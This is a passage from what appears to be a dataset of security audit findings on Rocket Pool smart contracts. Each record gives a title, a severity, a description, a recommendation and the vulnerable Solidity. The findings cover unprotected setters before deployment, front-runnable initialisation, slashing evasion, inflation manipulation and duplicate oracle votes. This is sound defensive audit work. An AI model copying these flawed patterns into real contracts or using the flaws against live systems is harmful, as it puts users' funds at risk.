only be used in an emergency situation to recover the DAO. Members that need removing when consensus is still viable, should be done via the 'kick' method.\\n```\\nчImplement the challenge-response process before enabling users to challenge other nodes. Implement means to detect misuse of this feature for griefing e.g. 
when one trusted node member forces another trusted node to defeat challenges over and over again (technical controls, monitoring).чч```\\nsetSettingUint('members.challenge.cooldown', 6172); // How long a member must wait before performing another challenge, approx. 1 day worth of blocks\\nsetSettingUint('members.challenge.window', 43204); // How long a member has to respond to a challenge. 7 days worth of blocks\\nsetSettingUint('members.challenge.cost', 1 ether); // How much it costs a non-member to challenge a members node. It's free for current members to challenge other members.\\n```\\n -RocketDAOProtocolSettings/RocketDAONodeTrustedSettings - anyone can set/overwrite settings until contract is declared “deployed” AcknowledgedчhighчThe `onlyDAOProtocolProposal` modifier guards all state-changing methods in this contract. However, analog to https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/7, the access control is disabled until the variable `settingsNameSpace.deployed` is set. 
If this contract is not deployed and configured in one transaction, anyone can update the contract while left unprotected on the blockchain.\\nSee issue 6.5 for a similar issue.\\n```\\nmodifier onlyDAOProtocolProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, \"deployed\")))) require(getContractAddress('rocketDAOProtocolProposals') == msg.sender, \"Only DAO Protocol Proposals contract can update a setting\");\\n \\_;\\n}\\n```\\n\\n```\\nmodifier onlyDAONodeTrustedProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, \"deployed\")))) require(getContractAddress('rocketDAONodeTrustedProposals') == msg.sender, \"Only DAO Node Trusted Proposals contract can update a setting\");\\n \\_;\\n}\\n```\\n\\nThere are at least 9 more occurrences of this pattern.чRestrict access to the methods to a temporary trusted account (e.g. guardian) until the system bootstrapping phase ends by setting `deployed` to `true.`чч```\\nmodifier onlyDAOProtocolProposal() {\\n // If this contract has been initialised, only allow access from the proposals contract\\n if(getBool(keccak256(abi.encodePacked(settingNameSpace, \"deployed\")))) require(getContractAddress('rocketDAOProtocolProposals') == msg.sender, \"Only DAO Protocol Proposals contract can update a setting\");\\n \\_;\\n}\\n```\\n -RocketStorage - anyone can set/update values before the contract is initializedчhighчAccording to the deployment script, the contract is deployed, and settings are configured in multiple transactions. This also means that for a period of time, the contract is left unprotected on the blockchain. Anyone can delete/set any value in the centralized data store. 
An attacker might monitor the mempool for new deployments of the `RocketStorage` contract and front-run calls to `contract.storage.initialised` setting arbitrary values in the system.\\n```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(\"contract.storage.initialised\"))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(\"contract.exists\", msg.sender))], \"Invalid or outdated network contract\");\\n }\\n \\_;\\n}\\n```\\nчRestrict access to the methods to a temporary trusted account (e.g. guardian) until the system bootstrapping phase ends by setting `initialised` to `true.`чч```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(\"contract.storage.initialised\"))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(\"contract.exists\", msg.sender))], \"Invalid or outdated network contract\");\\n }\\n \\_;\\n}\\n```\\n -RocketDAOProposals - Unpredictable behavior due to short vote delayчhighчA proposal can be voted and passed when it enters the `ACTIVE` state. Voting starts when the current `block.number` is greater than the `startBlock` configured in the proposal (up until the endBlock). 
The requirement for the `startBlock` is to be at least greater than `block.number` when the proposal is submitted.\\n```\\nrequire(\\_startBlock > block.number, \"Proposal start block must be in the future\");\\nrequire(\\_durationBlocks > 0, \"Proposal cannot have a duration of 0 blocks\");\\nrequire(\\_expiresBlocks > 0, \"Proposal cannot have a execution expiration of 0 blocks\");\\nrequire(\\_votesRequired > 0, \"Proposal cannot have a 0 votes required to be successful\");\\n```\\n\\nThe default vote delay configured in the system is `1` block.\\n```\\nsetSettingUint('proposal.vote.delay.blocks', 1); // How long before a proposal can be voted on after it is created. Approx. Next Block\\n```\\n\\nA vote is immediately passed when the required quorum is reached which allows it to be executed. This means that a group that is holding enough voting power can propose a change, wait for two blocks (block.number (of time of proposal creation) + configuredDelay (1) + 1 (for ACTIVE state), then vote and execute for the proposal to pass for it to take effect almost immediately after only 2 blocks (<30seconds).\\nSettings can be changed after 30 seconds which might be unpredictable for other DAO members and not give them enough time to oppose and leave the DAO.чThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change after two blocks. The only guarantee is that users can be sure the settings don't change for the next block if no proposal is active.\\nWe recommend giving the user advance notice of changes with a delay. For example, all upgrades should require two steps with a mandatory time window between them. 
The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.чч```\\nrequire(\\_startBlock > block.number, \"Proposal start block must be in the future\");\\nrequire(\\_durationBlocks > 0, \"Proposal cannot have a duration of 0 blocks\");\\nrequire(\\_expiresBlocks > 0, \"Proposal cannot have a execution expiration of 0 blocks\");\\nrequire(\\_votesRequired > 0, \"Proposal cannot have a 0 votes required to be successful\");\\n```\\n -RocketNodeStaking - Node operators can reduce slashing impact by withdrawing excess staked RPLчhighчOracle nodes update the Minipools' balance and progress it to the withdrawable state when they observe the minipools stake to become withdrawable. If the observed stakingEndBalance is less than the user deposit for that pool, the node operator is punished for the difference.\\n```\\nrocketMinipoolManager.setMinipoolWithdrawalBalances(\\_minipoolAddress, \\_stakingEndBalance, nodeAmount);\\n// Apply node penalties by liquidating RPL stake\\nif (\\_stakingEndBalance < userDepositBalance) {\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n rocketNodeStaking.slashRPL(minipool.getNodeAddress(), userDepositBalance - \\_stakingEndBalance);\\n}\\n```\\n\\nThe amount slashed is at max `userDepositBalance - stakingEndBalance`. The `userDepositBalance` is at least `16 ETH` (minipool.half/.full) and at max `32 ETH` (minipool.empty). The maximum amount to be slashed is therefore `32 ETH` (endBalance = 0, minipool.empty).\\nThe slashing amount is denoted in `ETH`. 
The `RPL` price (in ETH) is updated regularly by oracle nodes (see related issue https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/32; note that the `RPL` token is potentially affected by a similar issue as one can stake `RPL`, wait for the cooldown period & wait for the price to change, and withdraw stake at higher `RPL` price/ETH). The `ETH` amount to be slashed is converted to `RPL`, and the corresponding `RPL` stake is slashed.\\n```\\nuint256 rplSlashAmount = calcBase.mul(\\_ethSlashAmount).div(rocketNetworkPrices.getRPLPrice());\\n// Cap slashed amount to node's RPL stake\\nuint256 rplStake = getNodeRPLStake(\\_nodeAddress);\\nif (rplSlashAmount > rplStake) { rplSlashAmount = rplStake; }\\n// Transfer slashed amount to auction contract\\nrocketVault.transferToken(\"rocketAuctionManager\", getContractAddress(\"rocketTokenRPL\"), rplSlashAmount);\\n// Update RPL stake amounts\\ndecreaseTotalRPLStake(rplSlashAmount);\\ndecreaseNodeRPLStake(\\_nodeAddress, rplSlashAmount);\\n```\\n\\nIf the node does not have a sufficient `RPL` stake to cover the losses, the slashing amount is capped at whatever amount of `RPL` the node has left staked.\\nThe minimum amount of `RPL` a node needs to have staked if it operates minipools is calculated as follows:\\n```\\n // Calculate minimum RPL stake\\n return rocketDAOProtocolSettingsMinipool.getHalfDepositUserAmount()\\n .mul(rocketDAOProtocolSettingsNode.getMinimumPerMinipoolStake())\\n .mul(rocketMinipoolManager.getNodeMinipoolCount(\\_nodeAddress))\\n .div(rocketNetworkPrices.getRPLPrice());\\n}\\n```\\n\\nWith the current configuration, this would resolve in a minimum stake of `16 ETH * 0.1 (10% collateralization) * 1 (nr_minipools) * RPL_Price` for a node operating 1 minipool. 
This means a node operator basically only needs to have 10% of `16 ETH` staked to operate one minipool.\\nAn operator can withdraw their stake at any time, but they have to wait at least 14 days after the last time they staked (cooldown period). They can, at max, withdraw all but the minimum stake required to run the pools (nr_of_minipools * 16 ETH * 10%). This also means that after the cooldown period, they can reduce their stake to 10% of the half deposit amount (16ETH), then perform a voluntary exit on ETH2 so that the minipool becomes `withdrawable`. If they end up with less than the `userDepositBalance` in staking rewards, they would only get slashed the `1.6 ETH` at max (10% of 16ETH half deposit amount for 1 minipool) even though they incurred a loss that may be up to 32 ETH (empty Minipool empty amount).\\nFurthermore, if a node operator runs multiple minipools, let's say 5, then they would have to provide at least `5*16ETH*0.1 = 8ETH` as a security guarantee in the form of staked RPL. If the node operator incurs a loss with one of their minipools, their 8 ETH RPL stake will likely be slashed in full. Their other - still operating - minipools are not backed by any RPL anymore, and they effectively cannot be slashed anymore. This means that a malicious node operator can create multiple minipools, stake the minimum amount of RPL, get slashed for one minipool, and still operate the others without having the minimum RPL needed to run the minipools staked (getNodeMinipoolLimit).\\nThe RPL stake is donated to the RocketAuctionManager, where they can attempt to buy back RPL potentially at a discount.\\nNote: Staking more RPL (e.g., to add another Minipool) resets the cooldown period for the total RPL staked (not only for the newly added)чIt is recommended to redesign the withdrawal process to prevent users from withdrawing their stake while slashable actions can still occur. A potential solution may be to add a locking period in the process. 
A node operator may schedule the withdrawal of funds, and after a certain time has passed, may withdraw them. This prevents the immediate withdrawal of funds that may need to be reduced while slashable events can still occur. E.g.:\\nA node operator requests to withdraw all but the minimum required stake to run their pools.\\nThe funds are scheduled for withdrawal and locked until a period of X days has passed.\\n(optional) In this period, a slashable event occurs. The funds for compensation are taken from the user's stake including the funds scheduled for withdrawal.\\nAfter the time has passed, the node operator may call a function to trigger the withdrawal and get paid out.чч```\\nrocketMinipoolManager.setMinipoolWithdrawalBalances(\\_minipoolAddress, \\_stakingEndBalance, nodeAmount);\\n// Apply node penalties by liquidating RPL stake\\nif (\\_stakingEndBalance < userDepositBalance) {\\n RocketNodeStakingInterface rocketNodeStaking = RocketNodeStakingInterface(getContractAddress(\"rocketNodeStaking\"));\\n rocketNodeStaking.slashRPL(minipool.getNodeAddress(), userDepositBalance - \\_stakingEndBalance);\\n}\\n```\\n -RocketTokenRPL - inaccurate inflation rate and potential for manipulation lowering the real APYчhighчRocketTokenRPL allows users to swap their fixed-rate tokens to the inflationary RocketTokenRPL ERC20 token via a `swapToken` function. The DAO defines the inflation rate of this token and is initially set to be 5% APY. This APY is configured as a daily inflation rate (APD) with the corresponding `1 day in blocks` inflation interval in the `rocketDAOProtocolSettingsInflation` contract. The DAO members control the inflation settings.\\nAnyone can call `inflationMintTokens` to inflate the token, which mints tokens to the contracts RocketVault. Tokens are minted for discreet intervals since the last time `inflationMintTokens` was called (recorded as inflationCalcBlock). 
The inflation is then calculated for the passed intervals without taking the current not yet completed interval. However, the `inflationCalcBlock` is set to the current `block.number`, effectively skipping some “time”/blocks of the APY calculation.\\nThe more often `inflationMintTokens` is called, the higher the APY likelihood dropping below the configured 5%. In the worst case, one could manipulate the APY down to 2.45% (assuming that the APD for a 5% APY was configured) by calling `inflationMintTokens` close to the end of every second interval. This would essentially restart the APY interval at `block.number`, skipping blocks of the current interval that have not been accounted for.\\nThe following diagram illustrates the skipped blocks due to the incorrect recording of `inflationCalcBlock` as `block.number`. The example assumes that we are in interval 4 but have not completed it. `3` APD intervals have passed, and this is what the inflation rate is based on. However, the `inflationCalcBlock` is updated to the current `block.number`, skipping some time/blocks that are now unaccounted in the APY restarting the 4th interval at `block.number`.\\n\\nNote: updating the inflation rate will directly affect past inflation intervals that have not been minted! this might be undesirable, and it could be considered to force an inflation mint if the APY changes\\nNote: if the interval is small enough and there is a history of unaccounted intervals to be minted, and the Ethereum network is congested, gas fees may be high and block limits hit, the calculations in the for loop might be susceptible to DoS the inflation mechanism because of gas constraints.\\nNote: The inflation seems only to be triggered regularly on `RocketRewardsPool.claim` (or at any point by external actors). 
If the price establishes based on the total supply of tokens, then this may give attackers an opportunity to front-run other users trading large amounts of RPL that may previously have calculated their prices based on the un-inflated supply.\\nNote: that the discrete interval-based inflation (e.g., once a day) might create dynamics that put pressure on users to trade their RPL in windows instead of consecutively\\nthe inflation intervals passed is the number of completed intervals. The current interval that is started is not included.\\n```\\nfunction getInlfationIntervalsPassed() override public view returns(uint256) {\\n // The block that inflation was last calculated at\\n uint256 inflationLastCalculatedBlock = getInflationCalcBlock();\\n // Get the daily inflation in blocks\\n uint256 inflationInterval = getInflationIntervalBlocks();\\n // Calculate now if inflation has begun\\n if(inflationLastCalculatedBlock > 0) {\\n return (block.number).sub(inflationLastCalculatedBlock).div(inflationInterval);\\n }else{\\n return 0;\\n }\\n}\\n```\\n\\nthe inflation calculation calculates the to-be-minted tokens for the inflation rate at `newTokens = supply * rateAPD^intervals - supply`\\n```\\nfunction inflationCalculate() override public view returns (uint256) {\\n // The inflation amount\\n uint256 inflationTokenAmount = 0;\\n // Optimisation\\n uint256 inflationRate = getInflationIntervalRate();\\n // Compute the number of inflation intervals elapsed since the last time we minted infation tokens\\n uint256 intervalsSinceLastMint = getInlfationIntervalsPassed();\\n // Only update if last interval has passed and inflation rate is > 0\\n if(intervalsSinceLastMint > 0 && inflationRate > 0) {\\n // Our inflation rate\\n uint256 rate = inflationRate;\\n // Compute inflation for total inflation intervals elapsed\\n for (uint256 i = 1; i < intervalsSinceLastMint; i++) {\\n rate = rate.mul(inflationRate).div(10 \\*\\* 18);\\n }\\n // Get the total supply now\\n uint256 
totalSupplyCurrent = totalSupply();\\n // Return inflation amount\\n inflationTokenAmount = totalSupplyCurrent.mul(rate).div(10 \\*\\* 18).sub(totalSupplyCurrent);\\n }\\n // Done\\n return inflationTokenAmount;\\n}\\n```\\nчProperly track `inflationCalcBlock` as the end of the previous interval, as this is up to where the inflation was calculated, instead of the block at which the method was invoked.\\nEnsure APY/APD and interval configuration match up. Ensure the interval is not too small (potential gas DoS blocking inflation mint and RocketRewardsPool.claim).чч```\\nfunction getInlfationIntervalsPassed() override public view returns(uint256) {\\n // The block that inflation was last calculated at\\n uint256 inflationLastCalculatedBlock = getInflationCalcBlock();\\n // Get the daily inflation in blocks\\n uint256 inflationInterval = getInflationIntervalBlocks();\\n // Calculate now if inflation has begun\\n if(inflationLastCalculatedBlock > 0) {\\n return (block.number).sub(inflationLastCalculatedBlock).div(inflationInterval);\\n }else{\\n return 0;\\n }\\n}\\n```\\n -RocketDAONodeTrustedUpgrade - upgrade does not prevent the use of the same address multiple times creating an inconsistency where getContractAddress returns outdated informationчhighчWhen adding a new contract, it is checked whether the address is already in use. This check is missing when upgrading a named contract to a new implementation, potentially allowing someone to register one address to multiple names creating an inconsistent configuration.\\nThe crux of this is, that, `getContractAddress()` will now return a contract address that is not registered anymore (while `getContractName` may throw). 
`getContractAddress` can therefore not relied upon when checking ACL.\\nadd contract `name=test, address=0xfefe` ->\\n```\\n sets contract.exists.0xfefe=true\\n sets contract.name.0xfefe=test\\n sets contract.address.test=0xfefe\\n sets contract.abi.test=abi\\n```\\n\\nadd another contract `name=badcontract, address=0xbadbad` ->\\n```\\nsets contract.exists.0xbadbad=true\\nsets contract.name.0xbadbad=badcontract\\nsets contract.address.badcontract=0xbadbad\\nsets contract.abi.badcontract=abi\\n```\\n\\nupdate contract `name=test, address=0xbadbad` reusing badcontradcts address, the address is now bound to 2 names (test, badcontract)\\n```\\noverwrites contract.exists.0xbadbad=true` (even though its already true)\\nupdates contract.name.0xbadbad=test (overwrites the reference to badcontract; badcontracts config is now inconsistent)\\nupdates contract.address.test=0xbadbad (ok, expected)\\nupdates contract.abi.test=abi (ok, expected)\\nremoves contract.name.0xfefe (ok)\\nremoves contract.exists.0xfefe (ok)\\n```\\n\\nupdate contract `name=test, address=0xc0c0`\\n```\\nsets contract.exists.0xc0c0=true\\nsets contract.name.0xc0c0=test (ok, expected)\\nupdates contract.address.test=0xc0c0 (ok, expected)\\nupdates contract.abi.test=abi (ok, expected)\\nremoves contract.name.0xbadbad (the contract is still registered as badcontract, but is indirectly removed now)\\nremoves contract.exists.0xbadbad (the contract is still registered as badcontract, but is indirectly removed now)\\n```\\n\\nAfter this, `badcontract` is partially cleared, `getContractName(0xbadbad)` throws while `getContractAddress(badcontract)` returns `0xbadbad` which is already unregistered (contract.exists.0xbadbad=false)\\n```\\n(removed) contract.exists.0xbadbad\\n(removed) contract.name.0xbadbad=badcontract\\nsets contract.address.badcontract=0xbadbad\\nsets contract.abi.badcontract=abi\\n```\\n\\ncheck in `_addContract``\\n```\\nrequire(\\_contractAddress != address(0x0), \"Invalid contract 
address\");\\n```\\n\\nno checks in `upgrade.`\\n```\\nrequire(\\_contractAddress != address(0x0), \"Invalid contract address\");\\nrequire(\\_contractAddress != oldContractAddress, \"The contract address cannot be set to its current address\");\\n// Register new contract\\nsetBool(keccak256(abi.encodePacked(\"contract.exists\", \\_contractAddress)), true);\\nsetString(keccak256(abi.encodePacked(\"contract.name\", \\_contractAddress)), \\_name);\\nsetAddress(keccak256(abi.encodePacked(\"contract.address\", \\_name)), \\_contractAddress);\\nsetString(keccak256(abi.encodePacked(\"contract.abi\", \\_name)), \\_contractAbi);\\n```\\nчResolution\\nA check has been introduced to make sure that the new contract address is not already in use by checking against the corresponding `contract.exists` storage key.\\nCheck that the address being upgraded to is not yet registered and properly clean up `contract.address.`.чч```\\n sets contract.exists.0xfefe=true\\n sets contract.name.0xfefe=test\\n sets contract.address.test=0xfefe\\n sets contract.abi.test=abi\\n```\\n -RocketStorage - Risk concentration by giving all registered contracts permissions to change any settings in RocketStorage AcknowledgedчhighчThe ACL for changing settings in the centralized `RocketStorage` allows any registered contract (listed under contract.exists) to change settings that belong to other parts of the system.\\nThe concern is that if someone finds a way to add their malicious contract to the registered contact list, they will override any setting in the system. The storage is authoritative when checking certain ACLs. Being able to set any value might allow an attacker to gain control of the complete system. 
Allowing any contract to overwrite other contracts' settings dramatically increases the attack surface.\\n```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(\"contract.storage.initialised\"))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(\"contract.exists\", msg.sender))], \"Invalid or outdated network contract\");\\n }\\n \\_;\\n}\\n```\\n\\n```\\nfunction setAddress(bytes32 \\_key, address \\_value) onlyLatestRocketNetworkContract override external {\\n addressStorage[\\_key] = \\_value;\\n}\\n\\n/// @param \\_key The key for the record\\nfunction setUint(bytes32 \\_key, uint \\_value) onlyLatestRocketNetworkContract override external {\\n uIntStorage[\\_key] = \\_value;\\n}\\n```\\nчResolution\\nThe client provided the following statement:\\nWe've looked at adding access control contracts using namespaces, but the increase in gas usage would be significant and could hinder upgrades.\\nAllow contracts to only change settings related to their namespace.чч```\\nmodifier onlyLatestRocketNetworkContract() {\\n // The owner and other contracts are only allowed to set the storage upon deployment to register the initial contracts/settings, afterwards their direct access is disabled\\n if (boolStorage[keccak256(abi.encodePacked(\"contract.storage.initialised\"))] == true) {\\n // Make sure the access is permitted to only contracts in our Dapp\\n require(boolStorage[keccak256(abi.encodePacked(\"contract.exists\", msg.sender))], \"Invalid or outdated network contract\");\\n }\\n \\_;\\n}\\n```\\n -RocketDAOProposals - require a minimum participation quorum for DAO proposalsчmediumчIf the DAO falls below the minimum viable membership threshold, voting for proposals still 
continues as DAO proposals do not require a minimum participation quorum. In the worst case, this would allow the last standing DAO member to create a proposal that would be passable with only one vote even if new members would be immediately ready to join via the recovery mode (which has its own risks) as the minimum votes requirement for proposals is set as `>0`.\\n```\\nrequire(\\_votesRequired > 0, \"Proposal cannot have a 0 votes required to be successful\");\\n```\\n\\n```\\nfunction propose(string memory \\_proposalMessage, bytes memory \\_payload) override public onlyTrustedNode(msg.sender) onlyLatestContract(\"rocketDAONodeTrustedProposals\", address(this)) returns (uint256) {\\n // Load contracts\\n RocketDAOProposalInterface daoProposal = RocketDAOProposalInterface(getContractAddress('rocketDAOProposal'));\\n RocketDAONodeTrustedInterface daoNodeTrusted = RocketDAONodeTrustedInterface(getContractAddress('rocketDAONodeTrusted'));\\n RocketDAONodeTrustedSettingsProposalsInterface rocketDAONodeTrustedSettingsProposals = RocketDAONodeTrustedSettingsProposalsInterface(getContractAddress(\"rocketDAONodeTrustedSettingsProposals\"));\\n // Check this user can make a proposal now\\n require(daoNodeTrusted.getMemberLastProposalBlock(msg.sender).add(rocketDAONodeTrustedSettingsProposals.getCooldown()) <= block.number, \"Member has not waited long enough to make another proposal\");\\n // Record the last time this user made a proposal\\n setUint(keccak256(abi.encodePacked(daoNameSpace, \"member.proposal.lastblock\", msg.sender)), block.number);\\n // Create the proposal\\n return daoProposal.add(msg.sender, 'rocketDAONodeTrustedProposals', \\_proposalMessage, block.number.add(rocketDAONodeTrustedSettingsProposals.getVoteDelayBlocks()), rocketDAONodeTrustedSettingsProposals.getVoteBlocks(), rocketDAONodeTrustedSettingsProposals.getExecuteBlocks(), daoNodeTrusted.getMemberQuorumVotesRequired(), \\_payload);\\n}\\n```\\n\\nSidenote: Since a proposals acceptance quorum 
is recorded on proposal creation, this may lead to another scenario where proposals acceptance quorum may never be reached if members leave the DAO. This would require a re-submission of the proposal.чDo not accept proposals if the member count falls below the minimum DAO membercount threshold.чч```\\nrequire(\\_votesRequired > 0, \"Proposal cannot have a 0 votes required to be successful\");\\n```\\n -RocketDAONodeTrustedUpgrade - inconsistent upgrade blacklistчmediumч`upgradeContract` defines a hardcoded list of contracts that cannot be upgraded because they manage their own settings (statevars) or they hold value in the system.\\nthe list is hardcoded and cannot be extended when new contracts are added via `addcontract`. E.g. what if another contract holding value is added to the system? This would require an upgrade of the upgrade contract to update the whitelist (gas hungry, significant risk of losing access to the upgrade mechanisms if a bug is being introduced).\\na contract named `rocketPoolToken` is blacklisted from being upgradeable but the system registers no contract called `rocketPoolToken`. This may be an oversight or artifact of a previous iteration of the code. However, it may allow a malicious group of nodes to add a contract that is not yet in the system which cannot be removed anymore as there is no `removeContract` functionality and `upgradeContract` to override the malicious contract will fail due to the blacklist.\\nNote that upgrading `RocketTokenRPL` requires an account balance migration as contracts in the system may hold value in `RPL` (e.g. a lot in AuctionManager) that may vanish after an upgrade. The contract is not exempt from upgrading. A migration may not be easy to perform as the system cannot be paused to e.g. 
snapshot balances.\\n```\\nfunction \\_upgradeContract(string memory \\_name, address \\_contractAddress, string memory \\_contractAbi) internal {\\n // Check contract being upgraded\\n bytes32 nameHash = keccak256(abi.encodePacked(\\_name));\\n require(nameHash != keccak256(abi.encodePacked(\"rocketVault\")), \"Cannot upgrade the vault\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketPoolToken\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketTokenRETH\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketTokenNETH\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"casperDeposit\")), \"Cannot upgrade the casper deposit contract\");\\n // Get old contract address & check contract exists\\n```\\nчConsider implementing a whitelist of contracts that are allowed to be upgraded instead of a more error-prone blacklist of contracts that cannot be upgraded.\\nProvide documentation that outlines what contracts are upgradeable and why.\\nCreate a process to verify the blacklist before deploying/operating the system.\\nPlan for migration paths when upgrading contracts in the system\\nAny proposal that reaches the upgrade contract must be scrutinized for potential malicious activity (e.g. as any registered contract can directly modify storage or may contain subtle backdoors. 
Upgrading without performing a thorough security inspection may easily put the DAO at risk)чч```\\nfunction \\_upgradeContract(string memory \\_name, address \\_contractAddress, string memory \\_contractAbi) internal {\\n // Check contract being upgraded\\n bytes32 nameHash = keccak256(abi.encodePacked(\\_name));\\n require(nameHash != keccak256(abi.encodePacked(\"rocketVault\")), \"Cannot upgrade the vault\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketPoolToken\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketTokenRETH\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"rocketTokenNETH\")), \"Cannot upgrade token contracts\");\\n require(nameHash != keccak256(abi.encodePacked(\"casperDeposit\")), \"Cannot upgrade the casper deposit contract\");\\n // Get old contract address & check contract exists\\n```\\n -RocketMinipoolStatus - DAO Membership changes can result in votes getting stuckчmediumчChanges in the DAO's trusted node members are reflected in the `RocketDAONodeTrusted.getMemberCount()` function. When compared with the vote on consensus threshold, a DAO-driven decision is made, e.g., when updating token price feeds and changing Minipool states.\\nEspecially in the early phase of the DAO, the functions below can get stuck as execution is restricted to DAO members who have not voted yet. Consider the following scenario:\\nThe DAO consists of five members\\nTwo members vote to make a Minipool withdrawable\\nThe other three members are inactive, the community votes, and they get kicked from the DAO\\nThe two remaining members have no way to change the Minipool state now. 
All method calls to trigger the state update fail because the members have already voted before.\\nNote: votes of members that are kicked/leave still count towards the quorum!
In case the DAO gets into the scenario above, anyone can call the function to trigger a reevaluation of the condition with updated membership numbers and thus get the process unstuck.чч```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(\"rocketDAONodeTrusted\"));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n -Trusted/Oracle-Nodes can vote multiple times for different outcomesчmediumчTrusted/oracle nodes submit various ETH2 observations to the RocketPool contracts. When 51% of nodes submitted the same observation, the result is stored in the contract. However, while it is recorded that a node already voted for a specific minipool (being withdrawable & balance) or block (price/balance), a re-submission with different parameters for the same minipool/block is not rejected.\\nSince the oracle values should be distinct, clear, and there can only be one valid value, it should not be allowed for trusted nodes to change their mind voting for multiple different outcomes within one block or one minipool\\n`RocketMinipoolStatus` - a trusted node can submit multiple different results for one minipool\\nNote that `setBool(keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.node\", msg.sender, _minipoolAddress)), true);` is recorded but never checked. 
(as for the other two instances)\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.node\", msg.sender, \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.count\", \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), \"Duplicate submission from node\");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.node\", msg.sender, \\_minipoolAddress)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n```\\n\\n`RocketNetworkBalances` - a trusted node can submit multiple different results for the balances at a specific block\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(\"network.balances.submitted.node\", msg.sender, \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(\"network.balances.submitted.count\", \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), \"Duplicate submission from node\");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(\"network.balances.submitted.node\", msg.sender, \\_block)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n// Emit balances submitted event\\nemit BalancesSubmitted(msg.sender, \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply, block.timestamp);\\n// Check submission count & update network balances\\n```\\n\\n`RocketNetworkPrices` - a trusted node can submit multiple different results for the 
price at a specific block\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(\"network.prices.submitted.node\", msg.sender, \\_block, \\_rplPrice));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(\"network.prices.submitted.count\", \\_block, \\_rplPrice));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), \"Duplicate submission from node\");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(\"network.prices.submitted.node\", msg.sender, \\_block)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n// Emit prices submitted event\\nemit PricesSubmitted(msg.sender, \\_block, \\_rplPrice, block.timestamp);\\n// Check submission count & update network prices\\n```\\nчOnly allow one vote per minipool/block. Don't give nodes the possibility to vote multiple times for different outcomes.чч```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.node\", msg.sender, \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.count\", \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), \"Duplicate submission from node\");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(\"minipool.withdrawable.submitted.node\", msg.sender, \\_minipoolAddress)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n```\\n -RocketTokenNETH - Pot. discrepancy between minted tokens and 